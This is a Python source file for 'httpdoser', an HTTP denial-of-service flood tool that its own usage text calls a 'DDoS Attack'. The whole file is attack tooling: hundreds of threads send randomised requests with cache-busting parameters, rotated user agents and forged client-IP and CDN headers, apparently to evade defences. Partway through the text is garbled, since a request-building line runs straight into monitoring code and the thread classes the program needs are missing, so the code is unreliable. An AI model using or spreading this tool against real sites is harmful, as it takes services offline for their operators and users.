import urllib.request
import urllib.error
import urllib.parse
import ssl
import sys
import threading
import random
import re
import time
import json
#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0
rate_limit = 0 # Requests per second (0 = no limit)
request_times = []
http_method = "GET" # Default method
post_data = "" # For POST/PUT/PATCH methods
request_interval = 0 # Seconds between requests (0 = no interval)
custom_headers = {} # Custom headers to include
use_proxy_headers = False # Whether to use proxy headers
thread_count = 500 # Default thread count
def inc_counter():
global request_counter
request_counter+=1
def set_flag(val):
global flag
flag=val
def set_safe():
global safe
safe=1
def set_rate_limit(limit):
global rate_limit
rate_limit = limit
print(f"Rate limit set to {limit} requests per second")
def set_http_method(method):
global http_method
valid_methods = ["GET", "POST", "PUT", "PATCH", "HEAD", "OPTIONS"]
if method.upper() in valid_methods:
http_method = method.upper()
print(f"HTTP method set to {http_method}")
else:
print(f"Invalid HTTP method. Using default: GET")
http_method = "GET"
def set_interval(interval_str):
global request_interval
try:
# Remove any non-digit characters except decimal point
clean_str = ''.join(c for c in interval_str if c.isdigit() or c == '.')
request_interval = float(clean_str)
# Handle common time suffixes
if 'ms' in interval_str.lower():
request_interval /= 1000 # Convert ms to seconds
elif 's' in interval_str.lower():
# Already in seconds, no conversion needed
pass
print(f"Request interval set to {request_interval:.3f} seconds")
except ValueError:
print(f"Invalid interval value: {interval_str}. Using no interval.")
request_interval = 0
def set_custom_header(header_str):
global custom_headers
try:
if ':' in header_str:
key, value = header_str.split(':', 1)
key = key.strip()
value = value.strip()
custom_headers[key] = value
print(f"Custom header added: {key}: {value}")
else:
print(f"Invalid header format. Use 'Header-Name: value'")
except Exception as e:
print(f"Error parsing custom header: {e}")
def set_proxy_headers(enabled):
global use_proxy_headers
use_proxy_headers = enabled
if enabled:
print("Proxy headers (X-Forwarded-For, X-Real-IP, etc.) enabled")
else:
print("Proxy headers disabled")
def set_thread_count(count):
global thread_count
thread_count = count
print(f"Thread count set to {thread_count}")
# Generate random IP address
def generate_random_ip():
return f"{random.randint(1, 255)}.{random.randint(0, 255)}.{random.randint(0, 255)}.{random.randint(1, 255)}"
# Generate random IPv6 address
def generate_random_ipv6():
return ":".join([f"{random.randint(0x1000, 0xffff):x}" for _ in range(8)])
# Generate common proxy headers
def generate_proxy_headers():
headers = {}
# Random IP addresses
ipv4 = generate_random_ip()
ipv6 = generate_random_ipv6()
# Common proxy headers
headers['X-Forwarded-For'] = ipv4
headers['X-Real-IP'] = ipv4
headers['X-Forwarded-Host'] = host
headers['X-Forwarded-Proto'] = 'https' if url.startswith('https://') else 'http'
headers['X-Forwarded-Port'] = '443' if url.startswith('https://') else '80'
headers['X-Originating-IP'] = ipv4
headers['X-Remote-IP'] = ipv4
headers['X-Remote-Addr'] = ipv4
headers['X-Client-IP'] = ipv4
headers['X-Cluster-Client-IP'] = ipv4
# Cloudflare headers
if random.choice([True, False]):
headers['CF-Connecting-IP'] = ipv4
headers['CF-RAY'] = f"{buildblock(8)}-{buildblock(3)}"
headers['CF-IPCountry'] = random.choice(['US', 'GB', 'DE', 'FR', 'JP', 'CA', 'AU'])
# AWS headers
if random.choice([True, False]):
headers['X-Amz-Cf-Id'] = buildblock(16)
headers['X-Amz-Cf-Pop'] = random.choice(['IAD', 'DFW', 'LAX', 'MIA', 'SEA'])
# Random additional headers
additional_headers = {
'True-Client-IP': ipv4,
'X-ProxyUser-ID': str(random.randint(1000, 9999)),
'X-Correlation-ID': buildblock(16),
'X-Request-ID': buildblock(16),
'X-Session-ID': buildblock(16),
'X-Trace-ID': buildblock(16)
}
# Add 1-3 random additional headers
for _ in range(random.randint(1, 3)):
key, value = random.choice(list(additional_headers.items()))
headers[key] = value
return headers
# Rate limiting function
def enforce_rate_limit():
global request_times, rate_limit
if rate_limit <= 0:
return # No rate limiting
current_time = time.time()
# Remove timestamps older than 1 second
request_times = [t for t in request_times if current_time - t < 1.0]
# If we've reached the rate limit, sleep until we can make another request
if len(request_times) >= rate_limit:
sleep_time = 1.0 - (current_time - request_times[0])
if sleep_time > 0:
time.sleep(sleep_time)
# Update the list after sleeping
current_time = time.time()
request_times = [t for t in request_times if current_time - t < 1.0]
# Add current timestamp
request_times.append(current_time)
# generates a user agent array
def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
return(headers_useragents)
# generates a referer array
def referer_list():
global headers_referers
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://' + host + '/')
headers_referers.append('https://' + host + '/')
headers_referers.append('https://www.google.com/?q=')
return(headers_referers)
#builds random ascii string
def buildblock(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str += chr(a)
return(out_str)
# Generate random data for POST/PUT/PATCH requests
def generate_post_data():
data_types = ['form', 'json', 'xml']
data_type = random.choice(data_types)
if data_type == 'form':
# Form URL encoded data
params = {
'username': buildblock(random.randint(5, 10)),
'password': buildblock(random.randint(8, 15)),
'email': f"{buildblock(random.randint(5, 8))}@example.com",
'token': buildblock(random.randint(10, 20))
}
return urllib.parse.urlencode(params)
elif data_type == 'json':
# JSON data
data = {
'user': buildblock(random.randint(5, 10)),
'session': buildblock(random.randint(10, 15)),
'data': {
'action': random.choice(['login', 'register', 'update', 'delete']),
'id': random.randint(1000, 9999),
'timestamp': int(time.time())
}
}
return json.dumps(data)
else: # xml
# XML data
xml_data = f"""
{buildblock(random.randint(5, 10))}
{random.choice(['login', 'update', 'query'])}
{random.randint(1000, 9999)}
"""
return xml_data
def usage():
print('---------------------------------------------------')
print('USAGE: python httpdoser.py [options]')
print('httpdoser website : DDoS Attack')
print('Supports both HTTP and HTTPS')
print('')
print('OPTIONS:')
print(' -r : Maximum requests per second (default: 0 = no limit)')
print(' -m : HTTP method: GET, POST, PUT, PATCH, HEAD, OPTIONS')
print(' -i : Delay between requests (e.g., 0.5s, 100ms, 2)')
print(' -t : Number of threads (default: 500, max: 1000)')
print(' -s : Safe mode (stop on error detection)')
print(' -H "Header: val" : Add custom header (can be used multiple times)')
print(' -p : Enable proxy headers (X-Forwarded-For, X-Real-IP, etc.)')
print('')
print('EXAMPLES:')
print(' python httpdoser.py https://example.com')
print(' python httpdoser.py https://example.com -r 100 -m POST -t 1000')
print(' python httpdoser.py https://example.com -t 800 -p')
print(' python httpdoser.py https://example.com -m POST -t 1000 -r 200 -p')
print(' python httpdoser.py https://example.com -i 0.001s -t 500 -m POST')
print("\a")
print("""
...
;::::; Http_Doser Starting...
;::::; :; By Chip-Hacker
;:::::' :;
;:::::; ;.
,:::::' ; OOO\\
::::::; ; OOOOO\\
;:::::; ; OOOOOOOO
,;::::::; ;' / OOOOOOO
;:::::::::`. ,,,;. / / DOOOOOO
.';:::::::::::::::::;, / / DOOOO
,::::::;::::::;;;;::::;, / / DOOO
;`::::::`'::::::;;;::::: ,#/ / DOOO
:`:::::::`;::::::;;::: ;::# / DOOO
::`:::::::`;:::::::: ;::::# / DOO
`:`:::::::`;:::::: ;::::::#/ DOO
:::`:::::::`;; ;:::::::::## OO
::::`:::::::`;::::::::;:::# OO
`:::::`::::::::::::;'`:;::# O
`:::::`::::::::;' / / `:#
::::::`:::::;' / / `#
""")
print('---------------------------------------------------')
# Create SSL context that ignores certificate verification
ssl_context = ssl.create_default_context()
ssl_context.check_hostname = False
ssl_context.verify_mode = ssl.CERT_NONE
#http/https request
def httpcall(url):
useragent_list()
referer_list()
code=0
# Enforce rate limiting
enforce_rate_limit()
# Apply request interval if set
if request_interval > 0:
time.sleep(request_interval)
# Determine if we're using HTTPS
is_https = url.startswith('https://')
# Build URL with parameters for GET requests
if http_method == "GET":
if url.count("?")>0:
full_url = url + "&" + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))
else:
full_url = url + "?" + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))
else:
full_url = url # For other methods, use base URL
# Create request with appropriate method
request = urllib.request.Request(full_url, method=http_method)
# Add headers common to all methods
request.add_header('User-Agent', random.choice(headers_useragents))
request.add_header('Cache-Control', 'no-cache')
request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
request.add_header('Keep-Alive', str(random.randint(110,120)))
request.add_header('Connection', 'keep-alive')
request.add_header('Host', host)
# Add proxy headers if enabled
if use_proxy_headers:
proxy_headers = generate_proxy_headers()
for key, value in proxy_headers.items():
request.add_header(key, value)
# Add custom headers
for key, value in custom_headers.items():
request.add_header(key, value)
# Add method-specific headers and data
if http_method in ["POST", "PUT", "PATCH"]:
# Generate random post data
post_data = generate_post_data()
# Set appropriate Content-Type based on data format
if post_data.startswith('{'):
request.add_header('Content-Type', 'application/json')
elif post_data.startswith('= 1.0:
current_rps = requests_in_period
method_info = f" [{http_method}]"
interval_info = f" [Interval: {request_interval:.3f}s]" if request_interval > 0 else ""
proxy_info = " [ProxyHeaders]" if use_proxy_headers else ""
custom_info = f" [CustomHeaders:{len(custom_headers)}]" if custom_headers else ""
thread_info = f" [Threads:{thread_count}]"
if rate_limit > 0:
print(f"{request_counter} requests sent (RPS: {current_rps}/{rate_limit}{method_info}{interval_info}{proxy_info}{custom_info}{thread_info})")
else:
print(f"{request_counter} requests sent (RPS: {current_rps}{method_info}{interval_info}{proxy_info}{custom_info}{thread_info})")
requests_in_period = 0
last_time = current_time
previous = request_counter
# Update requests in current period
if request_counter > previous:
requests_in_period += (request_counter - previous)
previous = request_counter
time.sleep(0.1) # Small sleep to prevent CPU overload
if flag==2:
interval_msg = f" with {request_interval:.3f}s interval" if request_interval > 0 else ""
proxy_msg = " + proxy headers" if use_proxy_headers else ""
custom_msg = f" + {len(custom_headers)} custom headers" if custom_headers else ""
thread_msg = f" + {thread_count} threads"
print(f"\n -M60 Hits are succeeded with {http_method} method{interval_msg}{proxy_msg}{custom_msg}{thread_msg}")
#execute
if len(sys.argv) < 2:
usage()
sys.exit()
else:
if sys.argv[1] == "help" or sys.argv[1] == "-h":
usage()
sys.exit()
else:
url = sys.argv[1]
# Parse command line arguments
rate_limit_value = 0
method_set = False
i = 2 # Start from argument 2 (after URL)
while i < len(sys.argv):
arg = sys.argv[i]
if arg == "-r" and i+1 < len(sys.argv):
# Rate limit
try:
rate_limit_value = int(sys.argv[i+1])
set_rate_limit(rate_limit_value)
i += 2 # Skip next argument
except ValueError:
print("Invalid rate limit value. Using unlimited.")
i += 1
elif arg == "-m" and i+1 < len(sys.argv):
# HTTP method
set_http_method(sys.argv[i+1])
method_set = True
i += 2 # Skip next argument
elif arg == "-i" and i+1 < len(sys.argv):
# Request interval
set_interval(sys.argv[i+1])
i += 2 # Skip next argument
elif arg == "-t" and i+1 < len(sys.argv):
# Thread count
try:
thread_count_value = int(sys.argv[i+1])
if thread_count_value > 1000:
print("Thread count limited to 1000 for stability")
thread_count_value = 1000
set_thread_count(thread_count_value)
i += 2 # Skip next argument
except ValueError:
print("Invalid thread count value.")
i += 1
elif arg == "-H" and i+1 < len(sys.argv):
# Custom header
set_custom_header(sys.argv[i+1])
i += 2 # Skip next argument
elif arg == "-p":
# Proxy headers
set_proxy_headers(True)
i += 1
elif arg == "-s":
# Safe mode
set_safe()
print("Safe mode enabled")
i += 1
else:
# Unknown argument
print(f"Unknown argument: {arg}")
i += 1
# Set default method if not specified
if not method_set:
set_http_method("GET")
if url.startswith('https://'):
print(f"Flooding WebSite HTTPS Port 443 with {http_method} requests")
else:
print(f"Flooding WebSite HTTP Port 80 with {http_method} requests")
if url.count("/")==2:
url = url + "/"
# Updated regex to handle both http and https
m = re.search('https?://([^/]*)/?.*', url)
if m:
host = m.group(1)
else:
print("Invalid URL format. Use http:// or https://")
sys.exit()
# No longer auto-adjust thread count - use what user specified or default
print(f"Starting {thread_count} threads with rate limit: {rate_limit_value} RPS, Method: {http_method}, Interval: {request_interval:.3f}s")
for i in range(thread_count):
t = HTTPThread()
t.daemon = True
t.start()
t = MonitorThread()
t.daemon = True
t.start()
# Keep main thread alive
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
print("\nStopping attack...")
set_flag(2)